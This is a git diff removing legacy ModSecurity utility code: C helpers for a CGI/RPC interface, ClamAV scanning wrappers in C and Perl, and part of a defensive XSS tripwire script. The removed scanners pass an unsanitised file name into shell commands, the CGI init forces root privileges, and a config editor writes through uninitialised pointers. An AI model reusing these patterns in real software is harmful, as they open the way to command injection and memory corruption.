-			sprintf(line,"%s:REQUEST-END:========================================\n",time_str);
-			write(fd,line,strlen(line));
-			flock(fd,LOCK_UN);
-			if (fd!=2) close(fd);
-			break;
-	}
-	return 0;
-}
-
-int print_request_force(char* url,char *command,parameter_t *parameters, int num_of_parameters, int mask)
-{
-	char real_level[1024];
-
-	strcpy(real_level,modsec_rpc_log_level);
-	strcpy(modsec_rpc_log_level,"1");
-	print_request(url,command,parameters,num_of_parameters,mask);
-	strcpy(modsec_rpc_log_level,real_level);
-	return 0;
-}
-
-int print_reply(char *reply)
-{
-	char time_str[64];
-	time_t t;
-	int fd;
-
-	printf("%s",reply);
-	switch (atoi(modsec_rpc_log_level)) {
-	case DEBUG:
-			time(&t);
-			ctime_r(&t,time_str);
-			time_str[strlen(time_str)-1] = '\0';
-			if ((fd = open(modsec_rpc_log_file,O_WRONLY | O_CREAT | O_APPEND | O_SYNC , S_IRWXU)) < 0) {
-				print_error("print_request","open",modsec_rpc_log_file,errno);
-				fd=2;
-			}
-			flock(fd,LOCK_EX);
-			write(fd,reply,strlen(reply));
-			flock(fd,LOCK_UN);
-			if (fd!=2) close(fd);
-			break;
-	}
-	return 0;
-}
-
-int print_error(char *func1, char* func2, char* str, int err)
-{
-	char out[1024], time_str[64], line[1024*1024];
-	char str1[1024], str2[1024], str3[1024];
-	time_t t;
-	int fd;
-
-	time(&t);
-	ctime_r(&t,time_str);
-	time_str[strlen(time_str)-1] = '\0';
-	if (err)
-		strcpy(out,strerror(err));
-	else
-		strcpy(out,"");
-	if (!func1)
-		strcpy(str1,"");
-	else {
-		strncpy(str1,func1,1024);
-		str1[1023]='\0';
-	}
-	if (!func2)
-		strcpy(str2,"");
-	else {
-		strncpy(str2,func2,1024);
-		str2[1023]='\0';
-	}
-	if (!str)
-		strcpy(str3,"");
-	else {
-		strncpy(str3,str,1024);
-		str3[1023]='\0';
-	}
-
-	if ((fd = open(modsec_rpc_log_file,O_WRONLY | O_CREAT | O_APPEND | O_SYNC , S_IRWXU)) < 0) {
-		fprintf(stderr,"%s:ERROR:print_error:open:%s:%s\n",time_str,strerror(errno),modsec_rpc_log_file);
-		fd=2;
-	}
-	snprintf(line,1024*1024,"%s:ERROR:%s:%s:%s:%s\n",time_str,str1,str2,out,str3);
-	line[1024*1024-1]='\0';
-	flock(fd,LOCK_EX);
-	write(fd,line,strlen(line));
-	flock(fd,LOCK_UN);
-	if (fd!=2) close(fd);
-	return 0;
-}
-
-int is_proxy_up()
-{
-	int pid;
-	FILE *fp;
-
-	if ((fp = fopen(modsec_proxy_pid,"r")) == NULL )
-		return 0;
-
-	if (fscanf(fp,"%d",&pid) == 0) {
-		print_error("is_proxy_up","fscanf","missing PID",0);
-		fclose(fp);
-		return 0;
-	}
-	fclose(fp);
-
-        if (!pid || kill(pid,0))
-                return 0;
-
-	return 1;
-}
-
-int run_cmd(char *command, char *output, int output_size)
-{
-	char line[1024];
-	FILE *fp;
-
-	if (output_size > 0 && output) output[0]='\0';
-	if (!(fp=popen(command,"r"))) {
-		print_error("run_cmd","popen",command,errno);
-		return -1;
-	}
-
-	while (output_size && fgets(line,output_size>1024?1024:output_size,fp)) {
-		strcat(output, line);
-		output_size -= strlen(line);
-	}
-
-	if (!output_size)
-		while (fgets(line,1024,fp));
-
-	pclose(fp);
-	return 0;
-}
-
-int find_param_idx(char *parameter_name, parameter_t *parameters, int max_parameters)
-{
-	int i, idx=-1;
-
-	for (i = 0; (i < max_parameters) && (idx < 0); i++)
-		if ( strstr(parameters[i].name,parameter_name) )
-			idx=i;
-	return idx;
-}
-
-int parse_file(char *filename, parameter_t *parameters, int max_parameters)
-{
-        char line[1024], *ptr;
-	int i;
-        FILE *fp;
-
-	if (!max_parameters || (parameters == NULL) || (filename == NULL)) {
-		print_error("parse_file","invalid input parameters","none",0);
-		return 0;
-	}
-
-	if ((fp = fopen(filename,"r")) == NULL ) {
-		print_error("parse_file","fopen",filename,errno);
-		return 0;
-	}
-
-	i=0;
-	while ( i < max_parameters && fgets(line,1024,fp)) {
-		if (ptr = strstr(line,"#"))
-			*ptr='\0';
-		if (sscanf(line,"%[^=]=%s",parameters[i].name,parameters[i].value) != 2)
-			continue;
-		i++;
-	}
-
-	fclose(fp);
-
-	return i;
-}
-
-int change_file(char *filename, parameter_t parameter)
-{
-        char line[1024], *name, *value;
-	int i, found=0;
-        FILE *fp;
-
-	if (filename == NULL)
-		return 0;
-
-	if ((fp = fopen(filename,"r+")) == NULL )
-		return 0;
-
-	i=0;
-	while ( fgets(line,1024,fp)) {
-		sscanf(line,"%[^=]=%s",name,value);
-		if (name && !strcmp(name,parameter.name)) {
-			fprintf(fp,"%s=%s\n",name,parameter.value);
-			found=1;
-			continue;
-		} else fprintf(fp,"%s",line);
-	}
-
-	fclose(fp);
-	return found;
-}
-
-int copy_file(char *src_file, char *dst_file)
-{
-        char line[1024];
-        FILE *sfp, *dfp;
-
-	if (src_file == NULL || dst_file == NULL)
-		return 0;
-
-	if ((sfp = fopen(src_file,"r")) == NULL )
-		return 0;
-
-	if ((dfp = fopen(dst_file,"w")) == NULL ) {
-		fclose(sfp);
-		return 0;
-	}
-
-	while ( fgets(line,1024,sfp))
-		fprintf(dfp,"%s",line);
-
-	fclose(sfp);
-	fclose(dfp);
-	return 1;
-}
-
-int parse_query(char *query, parameter_t *parameters, int max_parameters)
-{
-	char *ptr, *dst_ptr, num[3];
-	int i, len;
-
-	if (!max_parameters || (parameters == NULL) || (query == NULL))
-		return 0;
-
-	ptr=query;
-	i=0;
-	while ((i < max_parameters) && *ptr) {
-		parameters[i].name[0] = '\0';
-		dst_ptr = parameters[i].name;
-		len=0;
-		while (*ptr && (*ptr != '=') && (len++ < MAX_NAME_LENGTH)) {
-			if (*ptr == '%' && *(ptr+1) && *(ptr+2)) {
-					num[0]=*(ptr+1);
-					num[1]=*(ptr+2);
-					num[2]='\0';
-					ptr += 3;
-					*dst_ptr=(char)strtol(num,NULL,16);
-					if (*dst_ptr) dst_ptr++;
-			} else *dst_ptr++ = *ptr++;
-		}
-		if (len >= MAX_NAME_LENGTH)
-			while (*ptr && (*ptr != '='))
-				*ptr++;
-		if (*ptr) ptr++;
-		*dst_ptr = '\0';
-		parameters[i].value[0] = '\0';
-		dst_ptr = parameters[i].value;
-		len=0;
-		while (*ptr && (*ptr != '&') && (len++ < MAX_VALUE_LENGTH)) {
-			if (*ptr == '%' && *(ptr+1) && *(ptr+2)) {
-					num[0]=*(ptr+1);
-					num[1]=*(ptr+2);
-					num[2]='\0';
-					ptr += 3;
-					*dst_ptr=(char)strtol(num,NULL,16);
-					if (*dst_ptr) dst_ptr++;
-			} else *dst_ptr++ = *ptr++;
-		}
-		if (len >= MAX_VALUE_LENGTH)
-			while (*ptr && (*ptr != '&'))
-				*ptr++;
-		if (*ptr) ptr++;
-		*dst_ptr = '\0';
-		i++;
-	}
-
-	return i;
-}
-
-int parse_query_and_body (parameter_t *parameters, int max_parameters)
-{
-	char *query, *content_length_env;
-	int i, num_of_params, body_len, content_length;
-
-	query = getenv("QUERY_STRING");
-	if (query && *query)
-		return(parse_query(query,parameters,max_parameters));
-	else {
-		content_length_env = getenv("CONTENT_LENGTH");
-		if (!content_length_env)
-			return 0;
-		if (! *content_length_env)
-			return 0;
-		content_length=atol(content_length_env);
-		if (!(query=malloc(content_length+1)))
-			return 0;
-	        i = 1; body_len=0;
-		while ( (body_len < content_length) && (i>0) ) {
-			i = read(0,query+body_len,(content_length-body_len)<1024?(content_length-body_len):1024);
-			if (i > 0 ) body_len+=i;
-		}
-		query[body_len] = '\0';
-		num_of_params = parse_query(query,parameters,max_parameters);
-		free(query);
-		return num_of_params;
-	}
-}
-
-int parse_cli (parameter_t *parameters, int max_parameters, int num_of_args, char *args[])
-{
-	char name[MAX_NAME_LENGTH], value[MAX_VALUE_LENGTH];
-	int i, num_of_params=0;
-
-	if (num_of_args > 0)
-		for (i=0; i<num_of_args && i<max_parameters; i++) {
-			if (sscanf(args[i],"%[^=]=%s",name,value) < 2)
-				continue;
-			if (strlen(name) < MAX_NAME_LENGTH)
-				strcpy(parameters[num_of_params].name,name);
-			else continue;
-			if (strlen(value) < MAX_VALUE_LENGTH) {
-				strcpy(parameters[num_of_params].value,value);
-				num_of_params++;
-			}
-		}
-	return num_of_params;
-}
-
-int send_request(char *request,char *ip,char *port,char *reply,int max_reply_size)
-{
-	int sock, i, reply_len;
-	struct  sockaddr_in servaddr;
-
-	reply[0]='\0';
-	reply_len=0;
-	if (!request || !*request || !ip || !port || !reply || !max_reply_size)
-		return -1;
-
-	memset(&servaddr, 0, sizeof(servaddr));
-	servaddr.sin_family = AF_INET;
-	servaddr.sin_port = htons((short)atol(port));
-	if ( inet_aton(ip, &servaddr.sin_addr) <= 0 )
-		return -1;
-
-	if ( (sock = socket(AF_INET, SOCK_STREAM, 0)) <  0 ) {
-		print_error("send_request","socket",ip,errno);
-		return -1;
-	}
-	if ( connect(sock, (struct sockaddr *) &servaddr, sizeof(servaddr) ) < 0 ) {
-		print_error("send_request","connect",ip,errno);
-		close(sock);
-		return -1;
-	}
-
-	i = strlen(request);
-	if ( write(sock,request,i) < i ) {
-		print_error("send_request","write",ip,errno);
-		shutdown(sock,SHUT_RDWR);
-		close(sock);
-		return -1;
-	}
-
-	i = 1; reply_len=0;
-	while ( (reply_len < max_reply_size) && (i>0) ) {
-		i = read(sock,reply+reply_len,(max_reply_size-reply_len)<1024?(max_reply_size-reply_len):1024);
-		if (i > 0 ) reply_len+=i;
-	}
-	reply[reply_len] = '\0';
-
-	shutdown(sock,SHUT_RDWR);
-	close(sock);
-	return reply_len;
-}
-
-int find_ip_idx(char *ip, blocklist_t *blocklist, int num_of_ips)
-{
-	int i, idx=-1;
-
-	for (i = 0; (i < num_of_ips) && (idx < 0); i++)
-		if ( strstr(blocklist[i].ip,ip) )
-			idx=i;
-	return idx;
-}
-
-int remove_ip_idx(char *ip, blocklist_t *blocklist, int num_of_ips)
-{
-	int i, j, idx=-1;
-	time_t t;
-
-	time(&t);
-	for (i = 0; i < num_of_ips; i++)
-		if ( (ip && strstr(blocklist[i].ip,ip)) || (!ip && (t > blocklist[i].end)) ) {
-			idx=i;
-			for (j=i; j<(num_of_ips-1); j++) {
-				strcpy(blocklist[j].ip,blocklist[j+1].ip);
-				blocklist[j].start = blocklist[j+1].start;
-				blocklist[j].duration = blocklist[j+1].duration;
-				blocklist[j].end = blocklist[j+1].end;
-				strcpy(blocklist[j].token,blocklist[j+1].token);
-			}
-			num_of_ips--;
-		}
-	return idx;
-}
-
-int read_conf_file (char *filename)
-{
-	int idx, num_of_params;
-	parameter_t parameters[MAX_PARAMS];
-
-	num_of_params=parse_file(filename,parameters,MAX_PARAMS);
-
-	if ((idx = find_param_idx("MODSEC_CLI_HOME",parameters,num_of_params)) >= 0)
-		strcpy(modsec_cli_home,parameters[idx].value);
-	if ((idx = find_param_idx("MODSEC_RPC_HOME",parameters,num_of_params)) >= 0)
-		strcpy(modsec_rpc_home,parameters[idx].value);
-
-	if ((idx = find_param_idx("MODSEC_RPC_LOG_FILE",parameters,num_of_params)) >= 0)
-		strcpy(modsec_rpc_log_file,parameters[idx].value);
-
-	if ((idx = find_param_idx("MODSEC_RPC_LOG_LEVEL",parameters,num_of_params)) >= 0)
-		strcpy(modsec_rpc_log_level,parameters[idx].value);
-
-	if ((idx = find_param_idx("MODSEC_RPC_SSL_LOCKFILE",parameters,num_of_params)) >= 0)
-		strcpy(modsec_rpc_ssl_lockfile,parameters[idx].value);
-
-	if ((idx = find_param_idx("MODSEC_RPC_SENSOR_LOCKFILE",parameters,num_of_params)) >= 0)
-		strcpy(modsec_rpc_sensor_lockfile,parameters[idx].value);
-
-	if ((idx = find_param_idx("MODSEC_RPC_REVERSEPROXY_LOCKFILE",parameters,num_of_params)) >= 0)
-		strcpy(modsec_rpc_reverseproxy_lockfile,parameters[idx].value);
-
-	if ((idx = find_param_idx("MODSEC_RPC_EXTERNALNIC_LOCKFILE",parameters,num_of_params)) >= 0)
-		strcpy(modsec_rpc_externalnic_lockfile,parameters[idx].value);
-
-	if ((idx = find_param_idx("MODSEC_RPC_MUI_LOCKFILE",parameters,num_of_params)) >= 0)
-		strcpy(modsec_rpc_mui_lockfile,parameters[idx].value);
-
-	if ((idx = find_param_idx("MODSEC_RPC_LOG_LEVEL",parameters,num_of_params)) >= 0)
-		strcpy(modsec_rpc_log_level,parameters[idx].value);
-
-	if ((idx = find_param_idx("MODSEC_PROXY_HOME",parameters,num_of_params)) >= 0)
-		strcpy(modsec_proxy_home,parameters[idx].value);
-
-	if ((idx = find_param_idx("MODSEC_PROXY_IP",parameters,num_of_params)) >= 0)
-		strcpy(modsec_proxy_ip,parameters[idx].value);
-
-	if ((idx = find_param_idx("MODSEC_PROXY_PORT",parameters,num_of_params)) >= 0)
-		strcpy(modsec_proxy_port,parameters[idx].value);
-
-	if ((idx = find_param_idx("MODSEC_PROXY_NETWORK_PREFIX",parameters,num_of_params)) >= 0)
-		strcpy(modsec_proxy_network_prefix,parameters[idx].value);
-
-	if ((idx = find_param_idx("MODSEC_PROXY_BIN",parameters,num_of_params)) >= 0)
-		strcpy(modsec_proxy_bin,parameters[idx].value);
-
-	if ((idx = find_param_idx("MODSEC_PROXY_CONF",parameters,num_of_params)) >= 0)
-		strcpy(modsec_proxy_conf,parameters[idx].value);
-
-	if ((idx = find_param_idx("MODSEC_PROXY_EXT_NIC",parameters,num_of_params)) >= 0)
-		strcpy(modsec_proxy_ext_nic,parameters[idx].value);
-
-	if ((idx = find_param_idx("MODSEC_PROXY_PID",parameters,num_of_params)) >= 0)
-		strcpy(modsec_proxy_pid,parameters[idx].value);
-
-	if ((idx = find_param_idx("MODSEC_PROXY_WHITELIST",parameters,num_of_params)) >= 0)
-		strcpy(modsec_proxy_whitelist,parameters[idx].value);
-
-	if ((idx = find_param_idx("MODSEC_PROXY_BLACKLIST",parameters,num_of_params)) >= 0)
-		strcpy(modsec_proxy_blacklist,parameters[idx].value);
-
-	if ((idx = find_param_idx("MODSEC_PROXY_TIMEOUT",parameters,num_of_params)) >= 0)
-		strcpy(modsec_proxy_timeout,parameters[idx].value);
-
-	if ((idx = find_param_idx("MODSEC_PROXY_EXCHANGE",parameters,num_of_params)) >= 0)
-		strcpy(modsec_proxy_exchange,parameters[idx].value);
-
-	if ((idx = find_param_idx("MODSEC_PROXY_EXT_IPS",parameters,num_of_params)) >= 0)
-		strcpy(modsec_proxy_ext_ips,parameters[idx].value);
-
-	if ((idx = find_param_idx("MODSEC_MUI_UI_ADMIN",parameters,num_of_params)) >= 0)
-		strcpy(modsec_mui_ui_admin,parameters[idx].value);
-
-	if ((idx = find_param_idx("MODSEC_RPC_PASSWORD_FILE",parameters,num_of_params)) >= 0)
-		strcpy(modsec_rpc_password_file,parameters[idx].value);
-
-	if ((idx = find_param_idx("MODSEC_MUI_UI_IPADDRESS",parameters,num_of_params)) >= 0)
-		strcpy(modsec_mui_ui_ipaddress,parameters[idx].value);
-
-	if ((idx = find_param_idx("MODSEC_MUI_UI_PORT",parameters,num_of_params)) >= 0)
-		strcpy(modsec_mui_ui_port,parameters[idx].value);
-
-	if ((idx = find_param_idx("SENSOR_ID",parameters,num_of_params)) >= 0)
-		strcpy(sensor_id,parameters[idx].value);
-
-	if ((idx = find_param_idx("SERIAL",parameters,num_of_params)) >= 0)
-		strcpy(serial,parameters[idx].value);
-
-	if ((idx = find_param_idx("VERSION_NUMBER",parameters,num_of_params)) >= 0)
-		strcpy(version_number,parameters[idx].value);
-
-	if ((idx = find_param_idx("RELEASE_DATE",parameters,num_of_params)) >= 0)
-		strcpy(release_date,parameters[idx].value);
-
-	if ((idx = find_param_idx("BRIDGE_MODE",parameters,num_of_params)) >= 0)
-		strcpy(bridge_mode,parameters[idx].value);
-
-	if ((idx = find_param_idx("DATA_DISK_SPACE",parameters,num_of_params)) >= 0)
-		strcpy(data_disk_space,parameters[idx].value);
-
-	if ((idx = find_param_idx("CONN_RATE",parameters,num_of_params)) >= 0)
-		strcpy(conn_rate,parameters[idx].value);
-
-	if ((idx = find_param_idx("CONN_RATE_PER_ADDR",parameters,num_of_params)) >= 0)
-		strcpy(conn_rate_per_addr,parameters[idx].value);
-
-	if ((idx = find_param_idx("CONNS",parameters,num_of_params)) >= 0)
-		strcpy(conns,parameters[idx].value);
-
-	if ((idx = find_param_idx("CONNS_PER_ADDR",parameters,num_of_params)) >= 0)
-		strcpy(conns_per_addr,parameters[idx].value);
-
-	if ((idx = find_param_idx("MODSEC_RPC",parameters,num_of_params)) >= 0)
-		strcpy(modsec_rpc,parameters[idx].value);
-
-	if ((idx = find_param_idx("MODSEC_PROXY",parameters,num_of_params)) >= 0)
-		strcpy(modsec_proxy,parameters[idx].value);
-
-	if ((idx = find_param_idx("MODSEC_PROXY_SCRIPT",parameters,num_of_params)) >= 0)
-		strcpy(modsec_proxy_script,parameters[idx].value);
-
-	return num_of_params;
-}
-
-int init_cgi()
-{
-	char *modsec;
-
-	setresuid(0,0,0);
-	setresgid(0,0,0);
-
-	strcpy(modsec_cli_home,"/opt/modsecurity-cli");
-	strcpy(modsec_rpc_home,"/opt/modsecurity-rpc");
-	strcpy(modsec_rpc_log_file,"/opt/modsecurity-rpc/var/logs/rpc.log");
-	strcpy(modsec_rpc_log_level,"0");
-	strcpy(modsec_rpc_ssl_lockfile,"/opt/modsecurity-rpc/var/run/ssl.lock");
-	strcpy(modsec_rpc_sensor_lockfile,"/opt/modsecurity-rpc/var/run/sensor.lock");
-	strcpy(modsec_rpc_externalnic_lockfile,"/opt/modsecurity-rpc/var/run/externalnic.lock");
-	strcpy(modsec_rpc_reverseproxy_lockfile,"/opt/modsecurity-rpc/var/run/reverseproxy.lock");
-	strcpy(modsec_rpc_mui_lockfile,"/opt/modsecurity-rpc/var/run/mui.lock");
-	strcpy(modsec_proxy_home,"/opt/modsecurity-proxy");
-	strcpy(modsec_proxy_ip,"127.0.0.2");
-	strcpy(modsec_proxy_port,"80");
-	strcpy(modsec_proxy_bin,"/bin/modsec-proxyd");
-	strcpy(modsec_proxy_script,"/etc/init.d/modsec-proxy");
-	strcpy(modsec_proxy_conf,"/etc/httpd.conf");
-	strcpy(modsec_proxy_ext_nic,"eth0");
-	strcpy(modsec_proxy_network_prefix,"172.16.0.0/12");
-	strcpy(modsec_proxy_pid,"/opt/modsecurity-proxy/var/run/httpd.pid");
-	strcpy(modsec_proxy_whitelist,"/opt/breach/etc/modsec_whitelist.conf");
-	strcpy(modsec_proxy_blacklist,"/opt/breach/etc/modsec_blacklist.conf");
-	strcpy(modsec_proxy_timeout,"120");
-	strcpy(modsec_proxy_exchange,"/opt/modsecurity-proxy/var/exchange");
-	strcpy(modsec_proxy_ext_ips,"/opt/breach/etc/modsec_ips.conf");
-	strcpy(modsec_mui_ui_ipaddress,"127.0.0.1");
-	strcpy(modsec_mui_ui_port,"443");
-	strcpy(modsec_rpc_password_file,"/opt/modsecurity-rpc/etc/.htpasswd");
-	strcpy(modsec_mui_ui_admin,"admin");
-	strcpy(sensor_id,"1");
-	strcpy(serial,"1");
-	strcpy(version_number,"2.0");
-	strcpy(bridge_mode,"off");
-	strcpy(data_disk_space,"60");
-	strcpy(release_date,"11-15-2006");
-	strcpy(conn_rate,"0");
-	strcpy(conn_rate_per_addr,"0");
-	strcpy(conns,"0");
-	strcpy(conns_per_addr,"0");
-
-	if (modsec = getenv("MODSEC"))
-		read_conf_file(modsec);
-	else {
-		if (!read_conf_file("/opt/breach/etc/modsec.conf"))
-			read_conf_file("/etc/modsec.conf");
-	}
-
-	return 0;
-}
diff --git a/util/av-scanning/runAV/common.h b/util/av-scanning/runAV/common.h
deleted file mode 100755
index da4941071..000000000
--- a/util/av-scanning/runAV/common.h
+++ /dev/null
@@ -1,99 +0,0 @@
-#include <stdio.h>
-#include <stdlib.h>
-#include <errno.h>
-#include <string.h>
-#include <sys/socket.h>
-#include <sys/types.h>
-#include <sys/stat.h>
-#include <arpa/inet.h>
-#include <unistd.h>
-#include <dirent.h>
-#include <time.h>
-#include <fcntl.h>
-#include <crypt.h>
-
-#define MAX_PARAMS 256
-#define MAX_IPS 256
-#define MAX_NAME_LENGTH 256
-#define MAX_VALUE_LENGTH 1024
-#define MAX_CMD_LENGTH 1024
-#define MAX_TOKEN_LENGTH 1024
-#define MAX_OUTPUT_LINE_LEN (1024)
-#define MAX_OUTPUT_SIZE (MAX_OUTPUT_LINE_LEN*1024)
-#define WHITE 1
-#define BLACK 0
-#define NONE 0
-#define DEBUG 1
-
-typedef struct {
-	char name[MAX_NAME_LENGTH];
-	char value[MAX_VALUE_LENGTH];
-} parameter_t;
-
-typedef struct {
-	char ip[16];
-	time_t start;
-	long duration;
-	time_t end;
-	char token[MAX_TOKEN_LENGTH];
-} blocklist_t;
-
-EXTERN int lock_file(char *filename);
-EXTERN int unlock_file(int fd);
-EXTERN int print_reply(char *reply);
-EXTERN int print_error(char *func1, char* func2, char* str, int err);
-EXTERN int print_request(char* url,char *command,parameter_t *parameters, int num_of_parameters, int mask);
-EXTERN int print_request_force(char* url,char *command,parameter_t *parameters, int num_of_parameters, int mask);
-EXTERN int is_proxy_up();
-EXTERN int run_cmd(char *command, char *output, int output_size);
-EXTERN int parse_cli (parameter_t *parameters, int max_parameters, int num_of_args, char *args[]);
-EXTERN int parse_query_and_body(parameter_t *parameters, int max_parameters);
-EXTERN int parse_query(char *query, parameter_t *parameters, int max_parameters);
-EXTERN int parse_file(char *filename, parameter_t *parameters, int max_parameters);
-EXTERN int copy_file(char *src_file, char *dst_file);
-EXTERN int change_file(char *filename, parameter_t parameter);
-EXTERN int find_param_idx(char *parameter_name, parameter_t *parameters, int max_parameters);
-EXTERN int init_cgi();
-EXTERN int send_request(char *request,char *ip,char *port,char *reply,int max_reply_size);
-EXTERN int find_ip_idx(char *ip, blocklist_t *blocklist, int num_of_ips);
-EXTERN int remove_ip_idx(char *ip, blocklist_t *blocklist, int num_of_ips);
-
-EXTERN char modsec_rpc[1024];
-EXTERN char modsec_rpc_home[1024];
-EXTERN char modsec_rpc_log_file[1024];
-EXTERN char modsec_rpc_log_level[1024];
-EXTERN char modsec_rpc_ssl_lockfile[1024];
-EXTERN char modsec_rpc_externalnic_lockfile[1024];
-EXTERN char modsec_rpc_sensor_lockfile[1024];
-EXTERN char modsec_rpc_reverseproxy_lockfile[1024];
-EXTERN char modsec_rpc_mui_lockfile[1024];
-EXTERN char modsec_proxy[1024];
-EXTERN char modsec_proxy_home[1024];
-EXTERN char modsec_proxy_script[1024];
-EXTERN char modsec_proxy_ip[1024];
-EXTERN char modsec_proxy_port[1024];
-EXTERN char modsec_proxy_bin[1024];
-EXTERN char modsec_proxy_conf[1024];
-EXTERN char modsec_proxy_ext_nic[1024];
-EXTERN char modsec_proxy_pid[1024];
-EXTERN char modsec_proxy_whitelist[1024];
-EXTERN char modsec_proxy_blacklist[1024];
-EXTERN char modsec_proxy_network_prefix[1024];
-EXTERN char modsec_proxy_timeout[1024];
-EXTERN char modsec_proxy_exchange[1024];
-EXTERN char modsec_proxy_ext_ips[1024];
-EXTERN char modsec_rpc_password_file[1024];
-EXTERN char modsec_mui_ui_admin[1024];
-EXTERN char modsec_mui_ui_ipaddress[1024];
-EXTERN char modsec_mui_ui_port[1024];
-EXTERN char modsec_cli_home[1024];
-EXTERN char sensor_id[1024];
-EXTERN char serial[1024];
-EXTERN char version_number[1024];
-EXTERN char bridge_mode[1024];
-EXTERN char data_disk_space[1024];
-EXTERN char release_date[1024];
-EXTERN char conn_rate[1024];
-EXTERN char conn_rate_per_addr[1024];
-EXTERN char conns[1024];
-EXTERN char conns_per_addr[1024];
diff --git a/util/av-scanning/runAV/comp b/util/av-scanning/runAV/comp
deleted file mode 100755
index aeee5db5e..000000000
--- a/util/av-scanning/runAV/comp
+++ /dev/null
@@ -1,2 +0,0 @@
-gcc -c -o common.o -DEXTERN= common.c
-gcc -o runAV -DEXTERN=extern common.o runAV.c
diff --git a/util/av-scanning/runAV/runAV-clamd.c b/util/av-scanning/runAV/runAV-clamd.c
deleted file mode 100755
index c3526ad81..000000000
--- a/util/av-scanning/runAV/runAV-clamd.c
+++ /dev/null
@@ -1,48 +0,0 @@
-#include "common.h"
-
-main(int argc, char *argv[])
-{
-	char cmd[MAX_OUTPUT_SIZE];
-	char output[MAX_OUTPUT_SIZE];
-	int error;
-	char *colon;
-	char *keyword;
-
-	if (argc > 1) {
-		sprintf (cmd, "/usr/bin/clamdscan --no-summary %s", argv[1]);
-		output[0] = '\0';
-		error = run_cmd(cmd,output,MAX_OUTPUT_SIZE);
-		if (error != 0) {
-			printf ("1 exec error %d: OK", error);
-		} else if (!*output) {
-			printf ("1 exec empty: OK");
-		}
-		else {
-		    colon = strstr(output, ":");
-		    if (colon) { colon += 2; }
-			if (!colon) {
-				printf ("0 unable to parse clamdscan output [%s] for cmd [%s]", output, cmd);
-			}
-			else if (keyword = strstr(colon, " FOUND")) {
-				*keyword = '\0';
-				printf ("0 clamdscan: %s", colon);
-			}
-			else if (keyword = strstr(colon, " ERROR")) {
-				*keyword = '\0';
-				printf ("0 clamdscan: %s", colon);
-			}
-			else if (keyword = strstr(colon, "OK")) {
-				printf ("1 clamdscan: OK");
-			}
-			else if (keyword = strstr(colon, "Empty file")) {
-				printf ("1 empty file");
-			}
-			else if (keyword = strstr(colon, "Can't access file ")) {
-				printf ("0 invalid file %s", keyword+18);
-			}
-			else {
-				printf ("0 unable to parse clamdscan output [%s] for cmd [%s]", output, cmd);
-			}
-		}
-	}
-}
diff --git a/util/av-scanning/runAV/runAV.c b/util/av-scanning/runAV/runAV.c
deleted file mode 100755
index 7d74d2e1b..000000000
--- a/util/av-scanning/runAV/runAV.c
+++ /dev/null
@@ -1,48 +0,0 @@
-#include "common.h"
-
-main(int argc, char *argv[])
-{
-	char cmd[MAX_OUTPUT_SIZE];
-	char output[MAX_OUTPUT_SIZE];
-	int error;
-	char *colon;
-	char *keyword;
-
-	if (argc > 1) {
-		sprintf (cmd, "/usr/bin/clamscan --no-summary %s", argv[1]);
-		output[0] = '\0';
-		error = run_cmd(cmd,output,MAX_OUTPUT_SIZE);
-		if (error != 0) {
-			printf ("1 exec error %d: OK", error);
-		} else if (!*output) {
-			printf ("1 exec empty: OK");
-		}
-		else {
-		    colon = strstr(output, ":");
-		    if (colon) { colon += 2; }
-			if (!colon) {
-				printf ("0 unable to parse clamscan output [%s] for cmd [%s]", output, cmd);
-			}
-			else if (keyword = strstr(colon, " FOUND")) {
-				*keyword = '\0';
-				printf ("0 clamscan: %s", colon);
-			}
-			else if (keyword = strstr(colon, " ERROR")) {
-				*keyword = '\0';
-				printf ("0 clamscan: %s", colon);
-			}
-			else if (keyword = strstr(colon, "OK")) {
-				printf ("1 clamscan: OK");
-			}
-			else if (keyword = strstr(colon, "Empty file")) {
-				printf ("1 empty file");
-			}
-			else if (keyword = strstr(colon, "Can't access file ")) {
-				printf ("0 invalid file %s", keyword+18);
-			}
-			else {
-				printf ("0 unable to parse clamscan output [%s] for cmd [%s]", output, cmd);
-			}
-		}
-	}
-}
diff --git a/util/av-scanning/runav.pl b/util/av-scanning/runav.pl
deleted file mode 100755
index c05fbf2ae..000000000
--- a/util/av-scanning/runav.pl
+++ /dev/null
@@ -1,40 +0,0 @@
-#!/usr/bin/perl
-#
-# runav.pl
-# Copyright (c) 2004-2011 Trustwave
-#
-# This script is an interface between ModSecurity and its
-# ability to intercept files being uploaded through the
-# web server, and ClamAV
-
-
-$CLAMSCAN = "clamscan";
-
-if ($#ARGV != 0) {
-    print "Usage: modsec-clamscan.pl <filename>\n";
-    exit;
-}
-
-my ($FILE) = shift @ARGV;
-
-$cmd = "$CLAMSCAN --stdout --disable-summary $FILE";
-$input = `$cmd`;
-$input =~ m/^(.+)/;
-$error_message = $1;
-
-$output = "0 Unable to parse clamscan output [$1]";
-
-if ($error_message =~ m/: Empty file\.?$/) {
-    $output = "1 empty file";
-}
-elsif ($error_message =~ m/: (.+) ERROR$/) {
-    $output = "0 clamscan: $1";
-}
-elsif ($error_message =~ m/: (.+) FOUND$/) {
-    $output = "0 clamscan: $1";
-}
-elsif ($error_message =~ m/: OK$/) {
-    $output = "1 clamscan: OK";
-}
-
-print "$output\n";
diff --git a/util/browser-tools/js-overrides.js b/util/browser-tools/js-overrides.js
deleted file mode 100644
index 34d501779..000000000
--- a/util/browser-tools/js-overrides.js
+++ /dev/null
@@ -1,78 +0,0 @@
-(function() { // don't leak XSSTripwire into global ns
-
-  /*
-  Assumptions:
-    - we need to run first, before any other attacker script
-    - we can't prevent tripwire from being detected (e.g. by side effects)
-  Todo:
-    - a lot more in lockdown
-    - protect XHR
-  */
-  var XSSTripwire = new Object();
-
-  XSSTripwire.report = function() {
-    // Notify server
-    var notify = XSSTripwire.newXHR();
-
-    // Create a results string to send back
-    var results;
-    try {
-      results = "HTML=" + encodeURIComponent(document.body.outerHTML);
-    } catch (e) {} // we don't always have document.body
-
-    notify.open("POST", XSSTripwire.ReportURL, true);
-    notify.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
-    notify.send(results);
-  }
-
-  XSSTripwire.lockdown = function(obj, name) {
-    if (Object.defineProperty) {
-      Object.defineProperty(obj, name, {
-        configurable: false
-      })
-    }
-  }
-
-  XSSTripwire.newXHR = function() {
-    var xmlreq = false;
-    if (window.XMLHttpRequest) {
-      xmlreq = new XMLHttpRequest();
-    } else if (window.ActiveXObject) {
-      // Try ActiveX
-      try {
-        xmlreq = new ActiveXObject("Msxml2.XMLHTTP");
-      } catch (e1) {
-        // first method failed
-        try {
-          xmlreq = new ActiveXObject("Microsoft.XMLHTTP");
-        } catch (e2) {
-          // both methods failed
-        }
